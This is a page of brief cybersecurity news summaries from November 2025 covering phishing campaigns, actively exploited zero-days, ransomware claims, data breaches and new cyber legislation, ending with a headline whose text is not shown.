A sophisticated phishing campaign is targeting organizations across Central and Eastern Europe, using HTML smuggling to deliver credential harvesting forms. Researchers at Cyble discovered the attack, which uses malicious HTML file attachments to bypass email security filters. Once a victim enters their credentials into the fake login page, an embedded JavaScript code exfiltrates the data directly to the attackers' private Telegram channels via the Telegram Bot API. This technique makes the campaign highly evasive, as it avoids the use of traditional, blockable C2 infrastructure.

Nov 13, 2025 · 5 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Patch Tuesday

Microsoft's November 2025 Patch Tuesday update addresses 63 vulnerabilities, including a critical Windows Kernel privilege escalation zero-day (CVE-2025-62215) that is being actively exploited in the wild. The flaw, which has a CVSS score of 7.0, allows a local attacker to gain SYSTEM-level privileges. The release also includes patches for four other critical vulnerabilities, notably a remote code execution flaw in the Microsoft Graphics Component (GDI+) with a CVSS score of 9.8 (CVE-2025-60724). Other significant fixes address high-severity issues in Windows Kerberos, Microsoft Office, and Visual Studio, requiring immediate attention from administrators to prevent potential system compromise and supply chain attacks.

Nov 12, 2025 · 5 min read

Advanced Threat Actor Exploits Cisco and Citrix Zero-Days in Targeted Attacks on Network Infrastructure

Amazon's threat intelligence team has discovered an advanced threat actor actively exploiting two previously undisclosed zero-day vulnerabilities in Cisco Identity Service Engine (ISE) and Citrix NetScaler Application Delivery Controllers (ADC). The vulnerabilities, now tracked as CVE-2025-20337 (Cisco) and CVE-2025-5777 (Citrix), are being used to target critical identity and network access control infrastructure. The attackers are leveraging custom malware to gain initial access and establish persistence on these edge devices. Both Cisco and Citrix have been notified and are working on patches, which security teams are urged to apply immediately upon release.

Nov 12, 2025 · 5 min read

UK Introduces Sweeping Cyber Security and Resilience Bill to Regulate MSPs and Mandate Stricter Breach Reporting

The UK government has introduced the Cyber Security and Resilience Bill to Parliament, a landmark piece of legislation set to replace the 2018 NIS Regulations. This new bill significantly expands the regulatory landscape by bringing Managed Service Providers (MSPs) into scope for the first time, a move impacting up to 1,100 firms. It also imposes stricter incident reporting rules, requiring an initial report within 24 hours and a full report within 72 hours. The legislation aims to bolster national security by strengthening supply chain resilience and aligning the UK with updated international standards like the EU's NIS2 Directive.

Nov 12, 2025 · 4 min read

Clop Ransomware Gang Claims Attack on Dartmouth College, Threatens to Leak Data

The notorious Clop ransomware gang has claimed responsibility for a cyberattack against Dartmouth College, an Ivy League university in the U.S. On November 11, 2025, the group added the institution to its dark web leak site, threatening to publish exfiltrated data if the university does not enter negotiations. This incident highlights the increasing trend of ransomware attacks targeting the education sector, which holds vast amounts of sensitive personal data. Dartmouth College has not yet issued a public statement on the alleged breach, but the threat from Clop is considered highly credible due to the group's track record.

Nov 12, 2025 · 5 min read

Iranian APT 'Ferocious Kitten' Continues to Target Dissidents With Custom MarkiRAT Surveillance Malware

The Iranian-aligned APT group 'Ferocious Kitten' continues its long-running cyber-espionage campaign against Iranian dissidents and activists, according to new research from Picus Security. Active since at least 2015, the group uses spear-phishing emails with malicious Office documents to deploy its custom remote access trojan (RAT), MarkiRAT. This malware is a sophisticated surveillance tool, featuring an advanced keylogger that activates only when password managers are not in use, clipboard hijacking, and data exfiltration over HTTP/S. The group also employs various defense evasion techniques, including the use of BITS and the RTLO trick to disguise malicious files.

Nov 12, 2025 · 5 min read

Critical Triofox Zero-Day Actively Exploited for System-Level Access

A critical, unauthenticated remote code execution vulnerability (CVE-2025-12480) in Gladinet's Triofox file-sharing platform is being actively exploited by a threat group tracked as UNC6485. The attackers are bypassing authentication by spoofing HTTP Host headers to 'localhost', allowing them to create rogue administrator accounts. They then abuse a built-in antivirus feature to execute malicious code with SYSTEM-level privileges, leading to full system compromise. Post-exploitation activity includes the deployment of commercial remote access tools like Zoho UEMS and AnyDesk to maintain persistence. Gladinet has released a patch, and organizations are urged to update immediately.

Nov 11, 2025 · 5 min read

KONNI APT Weaponizes Google's Find Hub for Destructive Attacks

The North Korea-linked threat group KONNI has been observed in a novel campaign targeting individuals in South Korea. The attackers use social engineering to deploy PC malware that steals Google account credentials. With these credentials, they access the victim's Google account and abuse the legitimate 'Find Hub' service (formerly Find My Device) to track the real-time location of the victim's Android phone and remotely trigger a factory reset, wiping all data. This campaign highlights the group's creativity in weaponizing legitimate services for destructive purposes.

Nov 11, 2025 · 5 min read

Pentagon Overhauls Cyber Force Model to Boost USCYBERCOM Readiness

The U.S. Department of War (DoW) has announced a new cyber force generation model aimed at enhancing the operational effectiveness, specialization, and lethality of forces assigned to U.S. Cyber Command (USCYBERCOM). The revised plan is designed to create a more integrated and agile cyber force by streamlining the processes of recruiting, training, and retaining personnel across all military branches. This strategic shift seeks to address emerging cyber threats and deter aggression in the cyber domain more effectively.

Nov 11, 2025 · 3 min read

Nikkei Slack Breach Exposes Data of 17,000 Users via Stolen Credentials

Japanese media giant Nikkei Inc., owner of the Financial Times, has disclosed a significant data breach affecting its internal Slack workspace. An attacker gained access using authentication credentials stolen from an employee's personal computer, which was infected with infostealer malware. The incident, which was detected in September 2025, exposed the names, email addresses, and chat histories of 17,368 employees and business partners. The breach highlights the persistent threat of infostealer malware and the security risks associated with credentials stored in web browsers.

Nov 11, 2025 · 4 min read

Hyundai IT Affiliate Discloses Major Data Breach Exposing PII and SSNs

Hyundai AutoEver America, the IT services subsidiary of the Hyundai Group, has begun notifying customers of a major data breach that occurred between late February and early March 2025. The incident involved unauthorized access to the company's IT environment, exposing highly sensitive personally identifiable information (PII), including full names, driver's license numbers, and Social Security numbers. While the exact number of victims is unconfirmed, the company's software is used in up to 2.7 million vehicles in North America, indicating a potentially massive scale.

Nov 11, 2025 · 4 min read

Cisco Firewalls Under Renewed Assault as New DoS Attack Variant Emerges

Cisco has issued an urgent security warning about a new denial-of-service (DoS) attack variant that is actively exploiting two previously patched vulnerabilities, CVE-2025-20333 and CVE-2025-20362, in its Secure Firewall ASA and FTD software. The campaign, which began on November 5, 2025, causes unpatched devices to enter a continuous reload loop, rendering them inoperable. This follows months of active exploitation by advanced threat actors, including a compromise of at least one US government agency. Cisco strongly urges all customers to apply the available patches immediately, as no effective workarounds exist.

Nov 11, 2025 · 6 min read

China's Cyber Arsenal Exposed: Knownsec Breach Leaks State Hacking Tools and Global Target Lists

A monumental data breach at Knownsec, a prominent Chinese cybersecurity firm with close government ties, has resulted in the exposure of over 12,000 classified documents. The leak, which occurred in early November 2025, provides an unprecedented view into China's offensive cyber capabilities, revealing a sophisticated arsenal of malware for multiple operating systems, custom hardware attack tools, and an extensive list of global espionage targets. The compromised data details large-scale data theft from countries including India, South Korea, and Taiwan, targeting critical infrastructure, government databases, and telecommunications networks, signaling a major intelligence failure for China's state-sponsored cyber operations.

Nov 10, 2025 · 6 min read

Swedish IT Supplier Breach Exposes Personal Data of 1.5 Million Citizens

The 'Datacarry' ransomware group has claimed responsibility for a major cyberattack on Miljödata, a Swedish IT supplier for local governments, exposing the sensitive personal data of up to 1.5 million people. The attack, which occurred in August 2025, targeted the company's HR systems, leading to the theft of names, government IDs, and contact information. The 224MB data archive was subsequently published on the dark web. The breach has caused service disruptions for numerous Swedish municipalities and affected data from major companies like SAS and Volvo. The incident is now under a national privacy investigation for potential GDPR violations.

Nov 10, 2025 · 5 min read

EU Governments Under Siege: ENISA Reports Massive Surge in DDoS and Data Attacks

A new threat landscape report from the EU Agency for Cybersecurity (ENISA) reveals that public administrations across the European Union are facing a dramatic increase in cyberattacks. DDoS attacks, largely driven by pro-Russia hacktivist groups like NoName057(16), account for 60% of all incidents, primarily targeting central governments. While disruptive, the report warns that data breaches (17.4%) and ransomware (10%) pose a more significant threat to the continuity of essential public services. ENISA also highlights ongoing espionage campaigns by Russian and Chinese state actors, and notes that the sector's immaturity under the new NIS2 Directive places it in a high-risk zone.

Nov 10, 2025 · 5 min read

It's Official: DoD Begins Phased Rollout of CMMC Cybersecurity Program

The U.S. Department of Defense (DoD) has officially started the phased, three-year implementation of its Cybersecurity Maturity Model Certification (CMMC) program as of November 10, 2025. DoD contracting officers can now begin inserting CMMC requirements into new solicitations for the Defense Industrial Base (DIB). The first phase requires contractors handling Federal Contract Information (FCI) or some Controlled Unclassified Information (CUI) to perform self-assessments. More stringent third-party certification requirements for higher CMMC levels will be introduced in subsequent phases, with full implementation expected by late 2028, fundamentally changing the security landscape for all DoD contractors.

Nov 10, 2025 · 4 min read

OWASP Top 10 for 2025 Released, Spotlighting Supply Chain and Design Flaws

The OWASP Foundation has released the 2025 release candidate for its influential Top 10 list of web application security risks. This update signals a major shift in focus, with the introduction of new categories like 'A03: Software Supply Chain Failures' and 'A10: Mishandling of Exceptional Conditions'. 'Broken Access Control' remains the top risk, but 'Security Misconfiguration' has climbed to the number two spot. The 2025 list emphasizes a move away from fixing individual bugs towards addressing systemic root causes like insecure design and dependency management, reflecting the modern threat landscape of complex, interconnected applications.

Nov 10, 2025 · 4 min read

Akira Ransomware Hits US Manufacturer Koch & Co., Threatens to Leak 54GB of Data

The Akira ransomware group has added U.S. manufacturer Koch & Co., Inc. to its list of victims. In a November 7 post on its dark web leak site, the group claimed to have stolen 54 gigabytes of sensitive corporate data, including detailed financials, contracts, and HR files. Akira is threatening to publish the data if a ransom is not paid. This attack is characteristic of Akira's double-extortion tactics, targeting mid-sized organizations with data exfiltration followed by encryption. Koch & Co. has not yet issued a public statement on the incident.

Nov 10, 2025 · 5 min read

OSCE Guide Urges Unified Cyber-Physical Defense for Critical Infrastructure

The Organization for Security and Cooperation in Europe (OSCE) has published a new technical guide advising governments and operators to adopt a unified approach to securing critical infrastructure. The guide emphasizes the growing convergence of physical and cybersecurity domains, warning that siloed security teams lack a holistic view of modern threats. It highlights how internet-connected Industrial Control Systems (ICS) have expanded the attack surface, making infrastructure vulnerable to remote cyberattacks. The document provides recommendations for integrating intrusion detection, access control, and insider threat management into a single, cohesive security framework.

Nov 10, 2025 · 4 min read

Microsoft 'Whisper Leak' Attack Can Spy on Encrypted AI Chats

Microsoft researchers have discovered a novel side-channel attack method named 'Whisper Leak' that undermines the privacy of encrypted AI chatbot conversations. By analyzing the size and timing of encrypted data packets from streaming Large Language Models (LLMs), a passive network observer can accurately infer the topic of a conversation. The proof-of-concept attack achieved over 98% accuracy against models from OpenAI, Mistral, xAI, and DeepSeek. While major AI providers have already implemented mitigations following a responsible disclosure, the finding exposes a fundamental privacy risk in the architecture of streaming LLMs, particularly for users in sensitive sectors like law and healthcare.

Nov 9, 2025 · 5 min read

Chinese-Made Electric Buses in Europe & Australia Pose Remote Shutdown Risk

Cybersecurity tests conducted in Norway on November 7, 2025, have uncovered a significant security risk in Chinese-manufactured Yutong electric buses, which are widely used across Europe and Australia. The 'Lion Cage' experiment demonstrated that the buses' connected systems could theoretically be accessed and disabled remotely by the manufacturer. The findings have triggered urgent security reviews by public transit authorities in multiple countries, highlighting the growing national security concerns surrounding internet-connected critical infrastructure and potential vulnerabilities in international supply chains.

Nov 9, 2025 · 5 min read

Philippines Lawmakers Push for National Cybersecurity Fund

In the Philippines, Representatives Migz and Luigi Villafuerte have introduced a proposal to create a 'Cybersecurity Risk Management and Mitigation Fund' (CRMMF). This dedicated national fund would provide the government with the necessary resources to prevent and respond to cyberattacks against both public and private sector entities. The proposal comes after recent DDoS attack attempts on local banks and designates 30% of the fund for rapid restoration of critical information infrastructure, signaling a strong political push to enhance the nation's cyber resilience.

Nov 9, 2025 · 4 min read

Critical Container Escape Flaws in runC Threaten Docker & Kubernetes

A security alert issued on November 9, 2025, warns of three new critical vulnerabilities in runC, the low-level container runtime used by Docker, Kubernetes, and other major container platforms. The flaws could allow a malicious actor to execute a 'container escape,' breaking out of the isolated container environment to gain unauthorized access to the underlying host operating system. A successful container escape is a worst-case scenario in cloud-native security, as it would allow an attacker to compromise all other containers on the host. Administrators of all containerized environments are urged to monitor for and apply patches immediately.

Nov 9, 2025 · 5 min read

Pwn2Own Day 1: Hackers Net $522K for 34 Zero-Days in SOHO Devices

The first day of Trend Micro's Pwn2Own Ireland 2025 competition was a resounding success for security researchers, who earned a total of $522,500 for demonstrating 34 unique zero-day vulnerabilities. In a stunning display, every single one of the 17 scheduled attempts against popular SOHO devices—including printers, NAS devices, and smart home products from brands like QNAP, Synology, Canon, and HP—was successful. The highlight was a complex 'SOHO Smashup' that chained eight bugs to compromise a router and a NAS device.

Nov 8, 2025 · 5 min read

Over 75% of Orgs Can't Keep Pace with AI-Powered Attacks, Survey Finds

A new survey from CrowdStrike reveals a stark reality: 76% of global organizations admit they cannot match the speed and sophistication of AI-powered cyberattacks. The 2025 State of Ransomware Survey highlights a dangerous 'confidence illusion,' where leaders believe they are prepared, yet 78% of their organizations were attacked in the past year. With adversaries using AI to accelerate attacks, 89% of security leaders now agree that AI-powered protection is essential to close the widening security gap and defend against modern threats.

Nov 8, 2025 · 5 min read

Malicious VS Code Extension with Ransomware Capabilities Discovered on Official Marketplace

A malicious Visual Studio (VS) Code extension named "susvsex" was discovered on the official VS Code Extension Marketplace. The extension, which appears to have been created with AI assistance, contained overt ransomware capabilities. Upon activation, it was designed to archive a target directory, exfiltrate the ZIP file to a remote server, and then encrypt the original files. The extension also used a private GitHub repository as a command-and-control channel. Although its default target was a test folder, it could easily be modified to target sensitive user data. Microsoft has since removed the extension, which was published on November 5, 2025.

Nov 8, 2025 · 5 min read

Data of Nearly 200,000 Supporters of Hungarian Party TISZA Leaked Online

The personal data of nearly 200,000 supporters of the Hungarian political party TISZA has been leaked and is being widely distributed online. The breach, which occurred in October 2025, originated from the party's "TISZA Világ" service. The compromised dataset, containing 198,500 records, has been added to the Have I Been Pwned service. Exposed information includes supporters' full names, email addresses, phone numbers, physical addresses, and usernames. This incident places affected individuals at significant risk of phishing, fraud, and other malicious targeting.

Nov 8, 2025 · 4 min read

Bahrain Fosters Digital Talent with AI and Cybersecurity Partnership

Bahrain is strengthening its national digital capabilities through a new partnership between Beyon Cyber, a cybersecurity firm, and Bahrain Polytechnic. The two organizations signed a Memorandum of Understanding (MoU) to foster innovation in Artificial Intelligence and cybersecurity. The collaboration aims to develop advanced, AI-driven security solutions and cultivate a skilled local workforce. This strategic initiative is aligned with Bahrain's goal of becoming a regional leader in technology and equipping its next generation of professionals with the skills to tackle modern cybersecurity challenges.

Nov 8, 2025 · 3 min read

Qilin Ransomware Strikes Again, Claiming Victims Across US, France, and Africa

The Qilin ransomware-as-a-service (RaaS) group has had a highly active month, listing numerous new victims on its data leak site. The group has claimed responsibility for attacks against a wide range of organizations in the U.S., France, and Africa. Victims include insurance providers, healthcare authorities, real estate firms, and French municipalities. This follows recent high-profile claims against two Texas electric cooperatives and Volkswagen Group Finance, demonstrating the group's broad targeting and operational capability, supported by resilient bulletproof hosting infrastructure.

Nov 8, 2025 · 5 min read

Cl0p Gang Exploits Oracle EBS Zero-Day in Massive Data Theft Spree

The Cl0p ransomware syndicate, also known as Graceful Spider, is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS). The flaw, which has a CVSS score of 9.8, allows for unauthenticated remote code execution and has been used to steal data from numerous organizations since at least August 2025. The attackers exfiltrated data for weeks before sending extortion demands in late September. In response, Oracle released an emergency patch on October 4, 2025, and CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating a patch deadline for federal agencies.

Nov 7, 2025 · 5 min read

SonicWall Breach Far Worse Than Feared: All Cloud Backup Users' Firewall Configs Stolen

**[SonicWall](https://www.sonicwall.com)** has issued a major update on a September data breach, revealing its impact is far more severe than initially disclosed. The company confirmed that an unauthorized party accessed and exfiltrated firewall configuration backups for **all** customers of its MySonicWall cloud backup service, a stark revision from the initial estimate of less than 5%. The stolen `.EXP` files contain complete firewall configurations, including security rules and encrypted credentials. While the credentials remain encrypted, security experts warn that possession of these files significantly lowers the bar for future targeted attacks. SonicWall, assisted by **[Mandiant](https://www.mandiant.com/)**, is urging all affected customers to reset passwords and follow detailed mitigation guidance.

Nov 7, 2025 · 5 min read

AI-Powered Social Engineering to Become Top Cyber Threat, ISACA Warns

A new report from the global IT association ISACA reveals a major shift in the threat landscape, with IT professionals now believing AI-driven social engineering will be the most significant cyber threat by 2026. The survey of 3,000 professionals found that 63% ranked this emerging threat highest, surpassing ransomware. Critically, the report also highlights a widespread lack of preparedness, with only 13% of organizations feeling 'very prepared' to manage the risks of generative AI, signaling an urgent need for new defense strategies and training.

Nov 7, 2025 · 6 min read

Massive 'I Paid Twice' Phishing Scheme Defrauds Booking.com Hotels and Guests

A sophisticated global phishing campaign named 'I Paid Twice' is targeting hotels on Booking.com and Expedia, compromising their administrative accounts to defraud guests. Since at least April 2025, attackers have been using social engineering and the PureRAT malware to gain access to hotel systems. Once in, they impersonate hotel staff to send fraudulent payment requests to travelers with upcoming reservations, tricking them into paying a second time via a malicious portal. Security firm Sekoia.io, which discovered the operation, reports that the campaign is highly active and has resulted in financial losses for an unknown number of victims.

Nov 7, 2025 · 5 min read

Samsung Zero-Day Exploited in the Wild to Install 'LANDFALL' Android Spyware

A now-patched zero-day vulnerability, CVE-2025-21042, in Samsung Galaxy devices was actively exploited to install a commercial-grade Android spyware known as LANDFALL. Researchers from Palo Alto Networks' Unit 42 discovered that attackers sent malicious DNG image files via WhatsApp to targets in the Middle East. The flaw, an out-of-bounds write in an image processing library, allowed for remote code execution. This incident highlights the growing trend of exploiting mobile image parsing libraries to deliver spyware, echoing similar attacks against Apple devices.

Nov 7, 2025 · 5 min read

State-Backed Hacking Escalates: Russia Targets Ukraine, China Eyes Latin America

A new report from ESET reveals a significant escalation in cyber operations by state-sponsored threat groups from Russia and China between April and September 2025. Russia-aligned groups, notably Sandworm, have accelerated destructive wiper malware attacks against Ukraine's critical infrastructure, including energy and logistics. Simultaneously, China-aligned actors like FamousSparrow have increased espionage activities targeting governmental entities in Latin America, potentially in response to shifting geopolitical dynamics. The report highlights a global landscape of heightened cyber conflict driven by national interests.

Nov 7, 2025 · 6 min read

Patient Sabotage: Malicious NuGet Packages with Time-Delayed ICS Payloads Discovered

Security researchers have discovered nine malicious packages on the NuGet repository, downloaded over 9,400 times, containing hidden, time-delayed sabotage code. One package, 'Sharp7Extend,' was specifically designed to corrupt write operations in industrial control systems (ICS) by silently causing them to fail after a grace period. This could lead to physical damage or production failures. The code was set to trigger on specific dates, some as far in the future as 2028, demonstrating a patient and highly destructive approach to supply chain attacks.

Nov 7, 2025 · 6 min read

Software Supply Chain Attacks Skyrocket to Record High, Driven by Ransomware Gangs

Software supply chain attacks reached an all-time high in October 2025, with 41 claimed incidents, according to a new report from Cyble. This figure is over 30% higher than the previous monthly record. Ransomware groups, particularly Qilin and Akira, are identified as the primary drivers of this trend, responsible for a majority of attacks in 2025. The information technology, finance, and energy sectors are the most heavily targeted, highlighting a strategic shift by attackers to compromise organizations through their trusted third-party suppliers.

Nov 7, 2025 · 5 min read

Amazon Patches High-Severity Flaw in WorkSpaces Linux Client

Amazon Web Services (AWS) has patched a high-severity vulnerability, CVE-2025-12779, in its WorkSpaces client for Linux. The flaw, rated 8.8 on the CVSS scale, could allow a local attacker on a shared computer to extract another user's authentication token and gain unauthorized access to their virtual desktop session. The issue affects Linux client versions 2023.0 through 2024.8. AWS has released a patched version and recommends all users upgrade immediately to mitigate the risk.

Nov 7, 2025 · 4 min read

CISA Adds Actively Exploited Control Web Panel RCE Flaw to KEV

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical command injection vulnerability in Control Web Panel (CWP), CVE-2025-48703, to its Known Exploited Vulnerabilities (KEV) catalog. The action confirms the flaw is being actively exploited in the wild. The vulnerability allows a remote, unauthenticated attacker to achieve remote code execution (RCE) on servers running the popular Linux web hosting panel. CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by November 25, 2025, and strongly urges all other organizations to remediate it immediately.

Nov 6, 2025 · 5 min read

U.S. Congressional Budget Office Breached by Suspected Foreign Actor

The U.S. Congressional Budget Office (CBO), the nonpartisan agency that provides economic analysis to Congress, confirmed on November 6, 2025, that it suffered a significant cybersecurity breach. The attack is suspected to be the work of a foreign government, raising concerns about espionage and the potential exposure of sensitive, pre-decisional information. Data at risk includes confidential communications between lawmakers and CBO analysts, as well as early drafts of legislative cost analyses. The CBO has taken steps to contain the incident and is investigating the full scope of the compromise.

Nov 6, 2025 · 6 min read

Cisco Warns of New DoS Attacks Actively Exploiting Firewall Flaws

Cisco has issued an urgent warning about a new attack variant actively targeting its Secure Firewall products. Threat actors are chaining two previously disclosed vulnerabilities, CVE-2025-20333 and CVE-2025-20362, to cause a denial-of-service (DoS) condition on unpatched Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) devices. These same flaws were exploited as zero-days in September 2025 and are listed in CISA's KEV catalog. Cisco strongly recommends that all customers immediately upgrade to patched software versions to prevent network outages and potential device compromise.

Nov 6, 2025 · 5 min read

Critical SQL Injection Flaw in Django Framework Puts Web Apps at Risk

The Django project has released urgent security updates to patch a critical SQL injection vulnerability, CVE-2025-64459, rated 9.1 on the CVSS scale. The flaw affects Django versions 4.2, 5.1, 5.2, and the 6.0 beta. It allows an attacker to manipulate database queries by passing a specially crafted dictionary to certain ORM methods, potentially leading to unauthorized data access, modification, or authentication bypass. Due to the widespread use of Django and the low complexity of the attack, developers are strongly urged to upgrade to the patched versions (4.2.26, 5.1.14, 5.2.8) immediately.

Nov 6, 2025 · 5 min read

Washington Post Confirms Breach in Cl0p's Oracle Supply Chain Attack

The Washington Post confirmed on November 6, 2025, that it was a victim of the widespread supply chain attack orchestrated by the Cl0p ransomware gang. The attack exploited a zero-day vulnerability in Oracle's E-Business Suite (EBS), a widely used enterprise software platform. This confirmation came after Cl0p added the newspaper to its dark web leak site, a classic extortion tactic. The incident highlights the significant risk of supply chain attacks, where a single vulnerability in a trusted third-party vendor's software can lead to the compromise of hundreds of high-profile organizations.

Nov 6, 2025 · 6 min read

Zscaler: 239 Malicious Apps on Google Play Downloaded 42 Million Times

A new report from Zscaler's ThreatLabz, published November 5, 2025, reveals a dramatic 67% year-over-year increase in Android malware. Researchers identified 239 malicious applications that successfully bypassed Google Play Store security, amassing a collective 42 million downloads before being removed. These apps often masqueraded as legitimate productivity 'Tools' to trick users. The report also highlights a dangerous trend in attacks against critical infrastructure, with the energy sector seeing a 387% surge in IoT/OT attacks, and significant increases in transportation and healthcare as well.

Nov 6, 2025 · 6 min read

Hackers Hijack Logistics Systems to Orchestrate Physical Cargo Heists

A new and growing form of hybrid crime is targeting the supply chain, where cybercriminals infiltrate freight and logistics companies to facilitate physical cargo theft. According to recent reports, threat actors compromise carrier systems, often using legitimate Remote Monitoring and Management (RMM) tools like ScreenConnect. Once inside, they manipulate digital 'load boards' to bid on and win real shipments. They then reroute the cargo to a location controlled by organized crime partners, leading to the theft of entire truckloads of goods. This trend highlights a critical vulnerability where the digital transformation of the logistics industry is being exploited to cause billions in real-world losses.

Nov 6, 2025 · 6 min read

CISA Adds Actively Exploited Gladinet and CWP Flaws to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming they are under active attack. The flaws include an information disclosure bug in Gladinet CentreStack/Triofox (CVE-2025-11371) and an OS command injection vulnerability in CWP Control Web Panel (CVE-2025-48703). Under Binding Operational Directive (BOD) 22-01, federal agencies are mandated to patch these vulnerabilities by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to defend against these active threats.

Nov 5, 2025 · 4 min read

CISA Warns of Critical ICS Flaws in Fuji, Delta, and Radiometrics Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released five advisories detailing critical vulnerabilities in Industrial Control Systems (ICS) from Fuji Electric, Survision, Delta Electronics, Radiometrics, and IDIS. The flaws, which include buffer overflows and authentication bypasses with CVSS scores up to 10.0, could allow remote code execution and severe disruption of critical infrastructure in sectors like manufacturing, energy, and aviation. CISA is urging immediate review and mitigation, as successful exploitation could lead to loss of control over industrial processes and, in some cases, create hazardous physical conditions.

Nov 5, 2025 · 5 min read

Swedish IT Firm Breach Exposes Data of 1.5 Million, Sparks GDPR Probe

The Swedish IT services firm Miljödata has suffered a severe data breach, exposing the personal and potentially sensitive information of over 1.5 million people. The incident, which occurred in late August, resulted in the stolen data being published on the darknet. In response, the Swedish Data Protection Authority (IMY) has launched a major investigation under the General Data Protection Regulation (GDPR), targeting both Miljödata and several of its public sector clients, including the City of Gothenburg and Region Västmanland.

Nov 5, 2025 · 4 min read

Identity is the New Perimeter: Stolen Credentials and Over-Privileged Accounts Drive Cloud Breaches

A consensus is forming across the cybersecurity industry: identity is the new security perimeter in the cloud. New reports from ReliaQuest and Amazon Web Services (AWS) reveal that identity-based attacks are the leading driver of cloud security incidents. Key findings show that compromised credentials caused 20% of breaches, while a staggering 99% of cloud identities are 'over-privileged,' possessing excessive permissions. Experts are urging a strategic shift away from network-centric security and towards a 'zero standing privileges' model, where access is granted on a temporary, as-needed basis to mitigate this massive attack surface.

Nov 5, 2025 · 3 min read

Hackers Claim Breach and Full Database Theft from Russian Nuclear Waste Facility 'Radon'

A threat actor has posted on a data leak forum claiming to have breached Radon, a Russian state-owned enterprise responsible for nuclear waste management and operated by the nuclear giant Rosatom. The attackers allege they have stolen the company's entire database, which reportedly includes sensitive test statistics, user IDs, and the personal information of employees. Security experts warn that if the claim is legitimate, the breach poses a severe risk, as the data could be used to forge safety documents, endanger physical safety, or launch sophisticated spear-phishing campaigns against Russia's critical nuclear infrastructure.

Nov 5, 2025 · 4 min read

F5 Hacked by Nation-State Actor; BIG-IP Source Code Stolen

F5 Networks has disclosed a severe security incident involving a 'highly sophisticated nation-state threat actor' that gained long-term access to its development environment. The attackers, suspected to be the Chinese espionage group UNC5221, successfully stole source code for F5's flagship BIG-IP products. While F5 found no evidence of a software supply chain compromise, the theft of these 'digital blueprints' creates a significant risk of future zero-day vulnerabilities. The Australian Cyber Security Centre (ACSC) has issued an urgent advisory, and F5 released a large batch of 44 new vulnerability patches concurrently with the disclosure.

Nov 4, 2025 · 5 min read

Millions of Devs at Risk: Critical RCE Flaw in Popular React Native Package

A critical remote code execution (RCE) vulnerability, CVE-2025-11953, has been discovered in a popular React Native command-line tool, putting millions of developers at risk. The flaw, rated 9.8 on the CVSS scale, exists in the '@react-native-community/cli' NPM package and allows an unauthenticated attacker to execute arbitrary code on a developer's machine by sending a malicious request to the Metro development server. This could lead to source code theft, malware injection, or a full-blown supply chain attack. Meta has released a patch, and developers are strongly urged to update their dependencies.

Nov 4, 2025 · 3 min read

Conti's Ghost: New 'DragonForce' Ransomware Adopts Cartel Model

A new ransomware operation named DragonForce has been identified by security researchers, notable for its use of leaked source code from the infamous Conti ransomware. Instead of a traditional Ransomware-as-a-Service (RaaS) model, DragonForce operates with a 'cartel-like' structure, providing affiliates with a builder to create their own branded ransomware variants. This approach facilitates the rapid proliferation of new threats, with groups like 'Devman' already seen deploying malware created with the DragonForce builder. The core malware retains Conti's technical features, including its encryption scheme and ability to spread via SMB.

Nov 4, 2025 · 4 min read

EU Stress-Tests Cyber Defenses in Large-Scale Crisis Simulation

The European Union has concluded its 2025 'Blueprint Operational Level Exercise' (BlueOLEx), a large-scale simulation designed to test and improve the bloc's collective response to major cybersecurity crises. Hosted in Cyprus with support from the EU's cybersecurity agency, ENISA, the exercise brought together senior officials from all member states to role-play a significant cyber incident affecting critical sectors. The drill was the first to test the new EU Cyber Blueprint, which aims to clarify roles and streamline coordination between national authorities and the European Commission during a cross-border attack.

Nov 4, 2025 · 3 min read

Philippine Police Brace for Coordinated DDoS Attacks on Government Websites

The Philippine National Police (PNP) has mobilized its cybersecurity units and placed them on high alert in anticipation of a potential large-scale distributed denial-of-service (DDoS) campaign targeting government websites. According to intelligence, the attacks are slated to begin on November 5, 2025. The PNP is coordinating with the Department of Information and Communications Technology (DICT) and other national agencies to harden critical digital infrastructure and prepare rapid response teams to mitigate any disruption to public services.

Nov 4, 2025 · 4 min read

US Cyber Threat Sharing Law 'CISA 2015' Expires, Creating Potential Intelligence Gap

The Cybersecurity Information Sharing Act of 2015 (CISA 2015), a foundational U.S. law that provided liability protections to encourage private companies to share cyber threat data with the government, expired on October 1, 2025. Amidst a government shutdown and a block by Senator Rand Paul, lawmakers failed to reauthorize the act. Security and legal experts warn this could have a chilling effect on threat intelligence sharing, with one law firm predicting a potential 80% drop. The lapse creates uncertainty and could hinder national cybersecurity efforts. In response, new legislation, the PACT Act, has been introduced to retroactively restore and extend the protections, but its future is uncertain.

Nov 3, 2025 · 5 min read

Insider Threat Shocker: Cybersecurity Pros Indicted for Wielding ALPHV/BlackCat Ransomware

In a severe breach of trust, two cybersecurity professionals, Ryan Clifford Goldberg and Kevin Tyler Martin, have been indicted for allegedly conducting ALPHV/BlackCat ransomware attacks against at least five U.S. companies. The individuals, who held roles in incident response and ransomware negotiation, are accused of conspiring to extort nearly $1.3 million from a Florida medical company. This case highlights a critical insider threat risk within the cybersecurity industry itself, where trusted professionals abuse their knowledge and access for criminal gain.

Nov 3, 2025 · 4 min read

SK Telecom Profit Plummets 90% Following Massive Data Breach Affecting 27 Million Customers

South Korean telecom giant SK Telecom has reported a catastrophic 90% drop in its Q3 operating profit, directly attributing the loss to the massive costs of a data breach that exposed the personal data of 27 million customers. The breach, which went undetected for nearly three years, involved 25 different malware types and led to a record $96.5 million (134 billion won) fine from regulators. This incident serves as a stark illustration of the severe and tangible financial consequences of long-term cybersecurity failures and inadequate threat detection.

Nov 3, 2025 · 4 min read

China Amends Cybersecurity Law, Massively Increasing Fines and Adding AI Governance Clause

